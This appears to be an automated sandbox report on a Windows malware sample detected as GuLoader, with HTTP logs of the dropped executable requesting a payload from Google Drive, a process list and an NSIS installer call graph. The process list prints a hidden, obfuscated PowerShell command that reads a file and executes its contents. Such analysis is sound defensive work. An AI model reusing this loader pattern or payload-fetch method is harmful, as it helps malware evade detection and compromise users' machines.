                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:19 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:20 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgS9uOp4jWQ7uYNhw9vvz_CS4awMW3BGnAe5msnLrANXk5Ljgp5buQXc7YPILmZfSI-fuZW0DWk
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:19 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-wHf_og30dQpb5FZl9Q3hLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 62 63 4b 39 38 34 39 78 65 44 76 68 5f 6a 69 49 37 6d 54 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qbcK9849xeDvh_jiI7mTUA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    68192.168.2.650054142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:20 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:21 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:21 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-7jqTJwz4ymIjZBAE1g2aVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Statistics

                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:23:27:14
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\av8XPPpdBc.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:706'493 bytes
                                                                                                                                                                                    MD5 hash:21F092B643089F4C05D3257430075A65
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:23:27:15
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "
                                                                                                                                                                                    Imagebase:0xc20000
                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2530768595.00000000094D4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:23:27:15
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:23:27:52
                                                                                                                                                                                    Start date:10/01/2025
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Autocueing.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:706'493 bytes
                                                                                                                                                                                    MD5 hash:21F092B643089F4C05D3257430075A65
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3393778928.0000000001764000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 62%, ReversingLabs
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:22.5%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:16.5%
                                                                                                                                                                                      Total number of Nodes:1350
                                                                                                                                                                                      Total number of Limit Nodes:30
                                                                                                                                                                                      execution_graph 3738 404f43 GetDlgItem GetDlgItem 3739 404f95 7 API calls 3738->3739 3747 4051ba 3738->3747 3740 40503c DeleteObject 3739->3740 3741 40502f SendMessageW 3739->3741 3742 405045 3740->3742 3741->3740 3743 40507c 3742->3743 3748 406594 21 API calls 3742->3748 3745 4044d6 22 API calls 3743->3745 3744 40529c 3746 405348 3744->3746 3751 4051ad 3744->3751 3757 4052f5 SendMessageW 3744->3757 3750 405090 3745->3750 3752 405352 SendMessageW 3746->3752 3753 40535a 3746->3753 3747->3744 3772 405229 3747->3772 3792 404e91 SendMessageW 3747->3792 3749 40505e SendMessageW SendMessageW 3748->3749 3749->3742 3756 4044d6 22 API calls 3750->3756 3754 40453d 8 API calls 3751->3754 3752->3753 3760 405373 3753->3760 3761 40536c ImageList_Destroy 3753->3761 3768 405383 3753->3768 3759 405549 3754->3759 3773 4050a1 3756->3773 3757->3751 3763 40530a SendMessageW 3757->3763 3758 40528e SendMessageW 3758->3744 3764 40537c GlobalFree 3760->3764 3760->3768 3761->3760 3762 4054fd 3762->3751 3769 40550f ShowWindow GetDlgItem ShowWindow 3762->3769 3766 40531d 3763->3766 3764->3768 3765 40517c GetWindowLongW SetWindowLongW 3767 405195 3765->3767 3777 40532e SendMessageW 3766->3777 3770 4051b2 3767->3770 3771 40519a ShowWindow 3767->3771 3768->3762 3785 4053be 3768->3785 3797 404f11 3768->3797 3769->3751 3791 40450b SendMessageW 3770->3791 3790 40450b SendMessageW 3771->3790 3772->3744 3772->3758 3773->3765 3776 4050f4 SendMessageW 3773->3776 3778 405177 3773->3778 3779 405132 SendMessageW 3773->3779 3780 405146 SendMessageW 3773->3780 3776->3773 3777->3746 3778->3765 3778->3767 3779->3773 3780->3773 3782 4054c8 3783 4054d3 InvalidateRect 3782->3783 3787 4054df 3782->3787 3783->3787 3784 4053ec SendMessageW 3786 405402 3784->3786 3785->3784 3785->3786 3786->3782 3788 405476 SendMessageW SendMessageW 3786->3788 3787->3762 3806 404e4c 3787->3806 3788->3786 3790->3751 3791->3747 3793 404ef0 SendMessageW 3792->3793 3794 404eb4 GetMessagePos ScreenToClient SendMessageW 3792->3794 3795 404ee8 3793->3795 3794->3795 3796 404eed 3794->3796 3795->3772 3796->3793 3809 406557 lstrcpynW 3797->3809 3799 404f24 3810 40649e wsprintfW 3799->3810 3801 404f2e 3802 40140b 2 API calls 3801->3802 3803 404f37 3802->3803 3811 406557 lstrcpynW 3803->3811 3805 404f3e 3805->3785 3812 404d83 3806->3812 3808 404e61 3808->3762 3809->3799 3810->3801 3811->3805 3813 404d9c 3812->3813 3814 406594 21 API calls 3813->3814 3815 404e00 3814->3815 3816 406594 21 API calls 3815->3816 3817 404e0b 3816->3817 3818 406594 21 API calls 3817->3818 3819 404e21 lstrlenW wsprintfW SetDlgItemTextW 3818->3819 3819->3808 3820 402643 3821 402672 3820->3821 3822 402657 3820->3822 3824 4026a2 3821->3824 3825 402677 3821->3825 3823 402d89 21 API calls 3822->3823 3834 40265e 3823->3834 3827 402dab 21 API calls 3824->3827 3826 402dab 21 API calls 3825->3826 3828 40267e 3826->3828 3829 4026a9 lstrlenW 3827->3829 3837 406579 WideCharToMultiByte 3828->3837 3829->3834 3831 402692 lstrlenA 3831->3834 3832 4026d6 3833 4026ec 3832->3833 3835 4060f9 WriteFile 3832->3835 3834->3832 3834->3833 3838 406128 SetFilePointer 3834->3838 3835->3833 3837->3831 3839 406144 3838->3839 3840 40615c 3838->3840 3841 4060ca ReadFile 3839->3841 3840->3832 3842 406150 3841->3842 3842->3840 3843 406165 SetFilePointer 3842->3843 3844 40618d SetFilePointer 3842->3844 3843->3844 3845 406170 3843->3845 3844->3840 3846 4060f9 WriteFile 3845->3846 3846->3840 3015 401946 3016 401948 3015->3016 3017 402dab 21 API calls 3016->3017 3018 40194d 3017->3018 3021 405c63 3018->3021 3061 405f2e 3021->3061 3024 405ca2 3027 405dcd 3024->3027 3075 406557 lstrcpynW 3024->3075 3025 405c8b DeleteFileW 3026 401956 3025->3026 3027->3026 3104 4068b4 FindFirstFileW 3027->3104 3029 405cc8 3030 405cdb 3029->3030 3031 405cce lstrcatW 3029->3031 3076 405e72 lstrlenW 3030->3076 3032 405ce1 3031->3032 3035 405cf1 lstrcatW 3032->3035 3036 405ce7 3032->3036 3039 405cfc lstrlenW FindFirstFileW 3035->3039 3036->3035 3036->3039 3038 405deb 3107 405e26 lstrlenW CharPrevW 3038->3107 3041 405dc2 3039->3041 3042 405d1e 3039->3042 3041->3027 3044 405da5 FindNextFileW 3042->3044 3054 405c63 64 API calls 3042->3054 3056 4055dc 28 API calls 3042->3056 3080 406557 lstrcpynW 3042->3080 3081 405c1b 3042->3081 3089 4055dc 3042->3089 3100 406317 MoveFileExW 3042->3100 3044->3042 3048 405dbb FindClose 3044->3048 3045 405c1b 5 API calls 3047 405dfd 3045->3047 3049 405e17 3047->3049 3050 405e01 3047->3050 3048->3041 3052 4055dc 28 API calls 3049->3052 3050->3026 3053 4055dc 28 API calls 3050->3053 3052->3026 3055 405e0e 3053->3055 3054->3042 3057 406317 40 API calls 3055->3057 3056->3044 3058 405e15 3057->3058 3058->3026 3110 406557 lstrcpynW 3061->3110 3063 405f3f 3111 405ed1 CharNextW CharNextW 3063->3111 3066 405c83 3066->3024 3066->3025 3067 406805 5 API calls 3073 405f55 3067->3073 3068 405f86 lstrlenW 3069 405f91 3068->3069 3068->3073 3071 405e26 3 API calls 3069->3071 3070 4068b4 2 API calls 3070->3073 3072 405f96 GetFileAttributesW 3071->3072 3072->3066 3073->3066 3073->3068 3073->3070 3074 405e72 2 API calls 3073->3074 3074->3068 3075->3029 3077 405e80 3076->3077 3078 405e92 3077->3078 3079 405e86 CharPrevW 3077->3079 3078->3032 3079->3077 3079->3078 3080->3042 3117 406022 GetFileAttributesW 3081->3117 3084 405c48 3084->3042 3085 405c36 RemoveDirectoryW 3087 405c44 3085->3087 3086 405c3e DeleteFileW 3086->3087 3087->3084 3088 405c54 SetFileAttributesW 3087->3088 3088->3084 3090 4055f7 3089->3090 3099 405699 3089->3099 3091 405613 lstrlenW 3090->3091 3092 406594 21 API calls 3090->3092 3093 405621 lstrlenW 3091->3093 3094 40563c 3091->3094 3092->3091 3095 405633 lstrcatW 3093->3095 3093->3099 3096 405642 SetWindowTextW 3094->3096 3097 40564f 3094->3097 3095->3094 3096->3097 3098 405655 SendMessageW SendMessageW SendMessageW 3097->3098 3097->3099 3098->3099 3099->3042 3101 406338 3100->3101 3102 40632b 3100->3102 3101->3042 3120 40619d 3102->3120 3105 405de7 3104->3105 3106 4068ca FindClose 3104->3106 3105->3026 3105->3038 3106->3105 3108 405e42 lstrcatW 3107->3108 3109 405df1 3107->3109 3108->3109 3109->3045 3110->3063 3112 405eee 3111->3112 3114 405f00 3111->3114 3113 405efb CharNextW 3112->3113 3112->3114 3116 405f24 3113->3116 3115 405e53 CharNextW 3114->3115 3114->3116 3115->3114 3116->3066 3116->3067 3118 405c27 3117->3118 3119 406034 SetFileAttributesW 3117->3119 3118->3084 3118->3085 3118->3086 3119->3118 3121 4061f3 GetShortPathNameW 3120->3121 3122 4061cd 3120->3122 3123 406312 3121->3123 3124 406208 3121->3124 3147 406047 GetFileAttributesW CreateFileW 3122->3147 3123->3101 3124->3123 3126 406210 wsprintfA 3124->3126 3128 406594 21 API calls 3126->3128 3127 4061d7 CloseHandle GetShortPathNameW 3127->3123 3129 4061eb 3127->3129 3130 406238 3128->3130 3129->3121 3129->3123 3148 406047 GetFileAttributesW CreateFileW 3130->3148 3132 406245 3132->3123 3133 406254 GetFileSize GlobalAlloc 3132->3133 3134 406276 3133->3134 3135 40630b CloseHandle 3133->3135 3149 4060ca ReadFile 3134->3149 3135->3123 3140 406295 lstrcpyA 3143 4062b7 3140->3143 3141 4062a9 3142 405fac 4 API calls 3141->3142 3142->3143 3144 4062ee SetFilePointer 3143->3144 3156 4060f9 WriteFile 3144->3156 3147->3127 3148->3132 3150 4060e8 3149->3150 3150->3135 3151 405fac lstrlenA 3150->3151 3152 405fed lstrlenA 3151->3152 3153 405ff5 3152->3153 3154 405fc6 lstrcmpiA 3152->3154 3153->3140 3153->3141 3154->3153 3155 405fe4 CharNextA 3154->3155 3155->3152 3157 406117 GlobalFree 3156->3157 3157->3135 3158 4015c6 3159 402dab 21 API calls 3158->3159 3160 4015cd 3159->3160 3161 405ed1 4 API calls 3160->3161 3173 4015d6 3161->3173 3162 401636 3164 401668 3162->3164 3165 40163b 3162->3165 3163 405e53 CharNextW 3163->3173 3168 401423 28 API calls 3164->3168 3183 401423 3165->3183 3175 401660 3168->3175 3172 40164f SetCurrentDirectoryW 3172->3175 3173->3162 3173->3163 3174 40161c GetFileAttributesW 3173->3174 3177 405b22 3173->3177 3180 405aab CreateDirectoryW 3173->3180 3187 405b05 CreateDirectoryW 3173->3187 3174->3173 3178 40694b 5 API calls 3177->3178 3179 405b29 3178->3179 3179->3173 3181 405af7 3180->3181 3182 405afb GetLastError 3180->3182 3181->3173 3182->3181 3184 4055dc 28 API calls 3183->3184 3185 401431 3184->3185 3186 406557 lstrcpynW 3185->3186 3186->3172 3188 405b15 3187->3188 3189 405b19 GetLastError 3187->3189 3188->3173 3189->3188 3847 404646 lstrlenW 3848 404665 3847->3848 3849 404667 WideCharToMultiByte 3847->3849 3848->3849 3850 4049c7 3851 4049f3 3850->3851 3852 404a04 3850->3852 3911 405b9b GetDlgItemTextW 3851->3911 3853 404a10 GetDlgItem 3852->3853 3856 404a6f 3852->3856 3855 404a24 3853->3855 3860 404a38 SetWindowTextW 3855->3860 3863 405ed1 4 API calls 3855->3863 3857 404b53 3856->3857 3865 406594 21 API calls 3856->3865 3909 404d02 3856->3909 3857->3909 3913 405b9b GetDlgItemTextW 3857->3913 3858 4049fe 3859 406805 5 API calls 3858->3859 3859->3852 3864 4044d6 22 API calls 3860->3864 3862 40453d 8 API calls 3867 404d16 3862->3867 3868 404a2e 3863->3868 3869 404a54 3864->3869 3870 404ae3 SHBrowseForFolderW 3865->3870 3866 404b83 3871 405f2e 18 API calls 3866->3871 3868->3860 3875 405e26 3 API calls 3868->3875 3872 4044d6 22 API calls 3869->3872 3870->3857 3873 404afb CoTaskMemFree 3870->3873 3874 404b89 3871->3874 3876 404a62 3872->3876 3877 405e26 3 API calls 3873->3877 3914 406557 lstrcpynW 3874->3914 3875->3860 3912 40450b SendMessageW 3876->3912 3882 404b08 3877->3882 3880 404ba0 3885 40694b 5 API calls 3880->3885 3881 404a68 3884 40694b 5 API calls 3881->3884 3883 404b3f SetDlgItemTextW 3882->3883 3886 406594 21 API calls 3882->3886 3883->3857 3884->3856 3892 404ba7 3885->3892 3887 404b27 lstrcmpiW 3886->3887 3887->3883 3889 404b38 lstrcatW 3887->3889 3888 404be8 3915 406557 lstrcpynW 3888->3915 3889->3883 3891 404bef 3893 405ed1 4 API calls 3891->3893 3892->3888 3897 405e72 2 API calls 3892->3897 3898 404c40 3892->3898 3894 404bf5 GetDiskFreeSpaceW 3893->3894 3896 404c19 MulDiv 3894->3896 3894->3898 3896->3898 3897->3892 3899 404cb1 3898->3899 3901 404e4c 24 API calls 3898->3901 3900 404cd4 3899->3900 3903 40140b 2 API calls 3899->3903 3916 4044f8 KiUserCallbackDispatcher 3900->3916 3902 404c9e 3901->3902 3904 404cb3 SetDlgItemTextW 3902->3904 3905 404ca3 3902->3905 3903->3900 3904->3899 3907 404d83 24 API calls 3905->3907 3907->3899 3908 404cf0 3908->3909 3917 404920 3908->3917 3909->3862 3911->3858 3912->3881 3913->3866 3914->3880 3915->3891 3916->3908 3918 404933 SendMessageW 3917->3918 3919 40492e 3917->3919 3918->3909 3919->3918 3920 401c48 3921 402d89 21 API calls 3920->3921 3922 401c4f 3921->3922 3923 402d89 21 API calls 3922->3923 3924 401c5c 3923->3924 3925 401c71 3924->3925 3926 402dab 21 API calls 3924->3926 3927 402dab 21 API calls 3925->3927 3931 401c81 3925->3931 3926->3925 3927->3931 3928 401cd8 3930 402dab 21 API calls 3928->3930 3929 401c8c 3932 402d89 21 API calls 3929->3932 3933 401cdd 3930->3933 3931->3928 3931->3929 3934 401c91 3932->3934 3935 402dab 21 API calls 3933->3935 3936 402d89 21 API calls 3934->3936 3938 401ce6 FindWindowExW 3935->3938 3937 401c9d 3936->3937 3939 401cc8 SendMessageW 3937->3939 3940 401caa SendMessageTimeoutW 3937->3940 3941 401d08 3938->3941 3939->3941 3940->3941 3942 4028c9 3943 4028cf 3942->3943 3944 4028d7 FindClose 3943->3944 3945 402c2f 3943->3945 3944->3945 3949 405550 3950 405560 3949->3950 3951 405574 3949->3951 3953 405566 3950->3953 3954 4055bd 3950->3954 3952 40557c IsWindowVisible 3951->3952 3960 405593 3951->3960 3952->3954 3956 405589 3952->3956 3955 404522 SendMessageW 3953->3955 3957 4055c2 CallWindowProcW 3954->3957 3958 405570 3955->3958 3959 404e91 5 API calls 3956->3959 3957->3958 3959->3960 3960->3957 3961 404f11 4 API calls 3960->3961 3961->3954 3962 4016d1 3963 402dab 21 API calls 3962->3963 3964 4016d7 GetFullPathNameW 3963->3964 3965 4016f1 3964->3965 3971 401713 3964->3971 3968 4068b4 2 API calls 3965->3968 3965->3971 3966 401728 GetShortPathNameW 3967 402c2f 3966->3967 3969 401703 3968->3969 3969->3971 3972 406557 lstrcpynW 3969->3972 3971->3966 3971->3967 3972->3971 3973 401e53 GetDC 3974 402d89 21 API calls 3973->3974 3975 401e65 GetDeviceCaps MulDiv ReleaseDC 3974->3975 3976 402d89 21 API calls 3975->3976 3977 401e96 3976->3977 3978 406594 21 API calls 3977->3978 3979 401ed3 CreateFontIndirectW 3978->3979 3980 40263d 3979->3980 3981 402955 3982 402dab 21 API calls 3981->3982 3983 402961 3982->3983 3984 402977 3983->3984 3985 402dab 21 API calls 3983->3985 3986 406022 2 API calls 3984->3986 3985->3984 3987 40297d 3986->3987 4009 406047 GetFileAttributesW CreateFileW 3987->4009 3989 40298a 3990 402a40 3989->3990 3993 4029a5 GlobalAlloc 3989->3993 3994 402a28 3989->3994 3991 402a47 DeleteFileW 3990->3991 3992 402a5a 3990->3992 3991->3992 3993->3994 3995 4029be 3993->3995 3996 4032b9 35 API calls 3994->3996 4010 4034ea SetFilePointer 3995->4010 3998 402a35 CloseHandle 3996->3998 3998->3990 3999 4029c4 4000 4034d4 ReadFile 3999->4000 4001 4029cd GlobalAlloc 4000->4001 4002 402a11 4001->4002 4003 4029dd 4001->4003 4005 4060f9 WriteFile 4002->4005 4004 4032b9 35 API calls 4003->4004 4007 4029ea 4004->4007 4006 402a1d GlobalFree 4005->4006 4006->3994 4008 402a08 GlobalFree 4007->4008 4008->4002 4009->3989 4010->3999 3555 403fd7 3556 404150 3555->3556 3557 403fef 3555->3557 3558 404161 GetDlgItem GetDlgItem 3556->3558 3561 4041a1 3556->3561 3557->3556 3559 403ffb 3557->3559 3560 4044d6 22 API calls 3558->3560 3562 404006 SetWindowPos 3559->3562 3563 404019 3559->3563 3564 40418b SetClassLongW 3560->3564 3565 4041fb 3561->3565 3574 401389 2 API calls 3561->3574 3562->3563 3567 404022 ShowWindow 3563->3567 3568 404064 3563->3568 3571 40140b 2 API calls 3564->3571 3566 404522 SendMessageW 3565->3566 3575 40414b 3565->3575 3597 40420d 3566->3597 3569 404042 GetWindowLongW 3567->3569 3570 40413d 3567->3570 3572 404083 3568->3572 3573 40406c DestroyWindow 3568->3573 3569->3570 3576 40405b ShowWindow 3569->3576 3637 40453d 3570->3637 3571->3561 3578 404088 SetWindowLongW 3572->3578 3579 404099 3572->3579 3577 40445f 3573->3577 3580 4041d3 3574->3580 3576->3568 3577->3575 3586 404490 ShowWindow 3577->3586 3578->3575 3579->3570 3584 4040a5 GetDlgItem 3579->3584 3580->3565 3585 4041d7 SendMessageW 3580->3585 3582 40140b 2 API calls 3582->3597 3583 404461 DestroyWindow EndDialog 3583->3577 3587 4040d3 3584->3587 3588 4040b6 SendMessageW IsWindowEnabled 3584->3588 3585->3575 3586->3575 3590 4040e0 3587->3590 3592 404127 SendMessageW 3587->3592 3593 4040f3 3587->3593 3601 4040d8 3587->3601 3588->3575 3588->3587 3589 406594 21 API calls 3589->3597 3590->3592 3590->3601 3592->3570 3594 404110 3593->3594 3595 4040fb 3593->3595 3599 40140b 2 API calls 3594->3599 3598 40140b 2 API calls 3595->3598 3596 40410e 3596->3570 3597->3575 3597->3582 3597->3583 3597->3589 3600 4044d6 22 API calls 3597->3600 3619 4043a1 DestroyWindow 3597->3619 3628 4044d6 3597->3628 3598->3601 3602 